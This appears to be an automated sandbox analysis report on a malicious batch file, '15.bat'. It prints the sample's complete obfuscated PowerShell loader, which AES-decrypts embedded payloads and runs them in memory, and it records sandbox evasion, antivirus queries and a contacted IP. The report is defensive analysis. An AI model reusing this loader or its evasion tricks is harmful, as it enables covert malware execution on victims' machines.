Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4908Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4988Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6183Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1073Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 6183 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 1073 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\15.bat';$mmjz='gelyestclyesurlyesrenlyestlyesprolyesceslyesslyes'.replace('lyes', ''),'chfgxtanfgxtgfgxteefgxtxfgxttefgxtnsfgxtifgxtofgxtnfgxt'.replace('fgxt', ''),'eletqwbmetqwbntqwbtattqwb'.replace('tqwb', ''),'crafgseafgsaafgstafgseafgsdecafgsryafgsptafgsorafgs'.replace('afgs', ''),'srlybprlyblrlybirlybtrlyb'.replace('rlyb', ''),'doaanecooaanmpoaanresoaansoaan'.replace('oaan', ''),'enhilctrhilcyhilcpohilcinhilcthilc'.replace('hilc', ''),'cdynropdynrytodynr'.replace('dynr', ''),'reaoapidlioapinesoapi'.replace('oapi', ''),'indqrqvodqrqkedqrq'.replace('dqrq', ''),'tratglinstglifotglirmtglifitglinatglilbltgliotglictgliktgli'.replace('tgli', ''),'mbkbwaibkbwnbkbwmodbkbwulbkbwebkbw'.replace('bkbw', ''),'froxggooxggmbaoxggseoxgg64soxggtroxggioxggngoxgg'.replace('oxgg', ''),'loajyrjdjyrj'.replace('jyrj', '');powershell -w hidden;function fbejp($jkmlp){$uerdi=[system.security.cryptography.aes]::create();$uerdi.mode=[system.security.cryptography.ciphermode]::cbc;$uerdi.padding=[system.security.cryptography.paddingmode]::pkcs7;$uerdi.key=[system.convert]::($mmjz[12])('dvsan8ricigbsq5peusffnrqief7d6jhj+mhqgaxpxa=');$uerdi.iv=[system.convert]::($mmjz[12])('rrmf8ddsiotkjyw5ahoolg==');$ytgvg=$uerdi.($mmjz[3])();$ftqfx=$ytgvg.($mmjz[10])($jkmlp,0,$jkmlp.length);$ytgvg.dispose();$uerdi.dispose();$ftqfx;}function mpycc($jkmlp){$fjjxj=new-object system.io.memorystream(,$jkmlp);$sysfb=new-object system.io.memorystream;$rdfpf=new-object system.io.compression.gzipstream($fjjxj,[io.compression.compressionmode]::($mmjz[5]));$rdfpf.($mmjz[7])($sysfb);$rdfpf.dispose();$fjjxj.dispose();$sysfb.dispose();$sysfb.toarray();}$bklld=[system.io.file]::($mmjz[8])([console]::title);$onbkh=mpycc (fbejp ([convert]::($mmjz[12])([system.linq.enumerable]::($mmjz[2])($bklld, 5).substring(2))));$hudry=mpycc (fbejp ([convert]::($mmjz[12])([system.linq.enumerable]::($mmjz[2])($bklld, 6).substring(2))));[system.reflection.assembly]::($mmjz[13])([byte[]]$hudry).($mmjz[6]).($mmjz[9])($null,$null);[system.reflection.assembly]::($mmjz[13])([byte[]]$onbkh).($mmjz[6]).($mmjz[9])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\15.bat';$mmjz='gelyestclyesurlyesrenlyestlyesprolyesceslyesslyes'.replace('lyes', ''),'chfgxtanfgxtgfgxteefgxtxfgxttefgxtnsfgxtifgxtofgxtnfgxt'.replace('fgxt', ''),'eletqwbmetqwbntqwbtattqwb'.replace('tqwb', ''),'crafgseafgsaafgstafgseafgsdecafgsryafgsptafgsorafgs'.replace('afgs', ''),'srlybprlyblrlybirlybtrlyb'.replace('rlyb', ''),'doaanecooaanmpoaanresoaansoaan'.replace('oaan', ''),'enhilctrhilcyhilcpohilcinhilcthilc'.replace('hilc', ''),'cdynropdynrytodynr'.replace('dynr', ''),'reaoapidlioapinesoapi'.replace('oapi', ''),'indqrqvodqrqkedqrq'.replace('dqrq', ''),'tratglinstglifotglirmtglifitglinatglilbltgliotglictgliktgli'.replace('tgli', ''),'mbkbwaibkbwnbkbwmodbkbwulbkbwebkbw'.replace('bkbw', ''),'froxggooxggmbaoxggseoxgg64soxggtroxggioxggngoxgg'.replace('oxgg', ''),'loajyrjdjyrj'.replace('jyrj', '');powershell -w hidden;function fbejp($jkmlp){$uerdi=[system.security.cryptography.aes]::create();$uerdi.mode=[system.security.cryptography.ciphermode]::cbc;$uerdi.padding=[system.security.cryptography.paddingmode]::pkcs7;$uerdi.key=[system.convert]::($mmjz[12])('dvsan8ricigbsq5peusffnrqief7d6jhj+mhqgaxpxa=');$uerdi.iv=[system.convert]::($mmjz[12])('rrmf8ddsiotkjyw5ahoolg==');$ytgvg=$uerdi.($mmjz[3])();$ftqfx=$ytgvg.($mmjz[10])($jkmlp,0,$jkmlp.length);$ytgvg.dispose();$uerdi.dispose();$ftqfx;}function mpycc($jkmlp){$fjjxj=new-object system.io.memorystream(,$jkmlp);$sysfb=new-object system.io.memorystream;$rdfpf=new-object system.io.compression.gzipstream($fjjxj,[io.compression.compressionmode]::($mmjz[5]));$rdfpf.($mmjz[7])($sysfb);$rdfpf.dispose();$fjjxj.dispose();$sysfb.dispose();$sysfb.toarray();}$bklld=[system.io.file]::($mmjz[8])([console]::title);$onbkh=mpycc (fbejp ([convert]::($mmjz[12])([system.linq.enumerable]::($mmjz[2])($bklld, 5).substring(2))));$hudry=mpycc (fbejp ([convert]::($mmjz[12])([system.linq.enumerable]::($mmjz[2])($bklld, 6).substring(2))));[system.reflection.assembly]::($mmjz[13])([byte[]]$hudry).($mmjz[6]).($mmjz[9])($null,$null);[system.reflection.assembly]::($mmjz[13])([byte[]]$onbkh).($mmjz[6]).($mmjz[9])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts131
Windows Management Instrumentation		1
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping14
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Modify Registry		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)151
Virtualization/Sandbox Evasion		Security Account Manager151
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets23
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1429038 Sample: 15.bat Startdate: 20/04/2024 Architecture: WINDOWS Score: 68 32 Snort IDS alert for network traffic 2->32 34 Antivirus detection for URL or domain 2->34 8 cmd.exe 1 2->8         started        process3 signatures4 36 Very long command line found 8->36 11 cmd.exe 1 8->11         started        14 conhost.exe 8->14         started        process5 signatures6 38 Very long command line found 11->38 16 powershell.exe 2 30 11->16         started        20 conhost.exe 11->20         started        22 cmd.exe 1 11->22         started        process7 dnsIp8 26 193.222.96.128, 4449, 49730, 49738 SWISSCOMSwisscomSwitzerlandLtdCH Germany 16->26 28 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->28 30 Suspicious powershell command line found 16->30 24 powershell.exe 28 16->24         started        signatures9 process10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
15.bat5%ReversingLabs
15.bat5%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://crl.microsoft0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
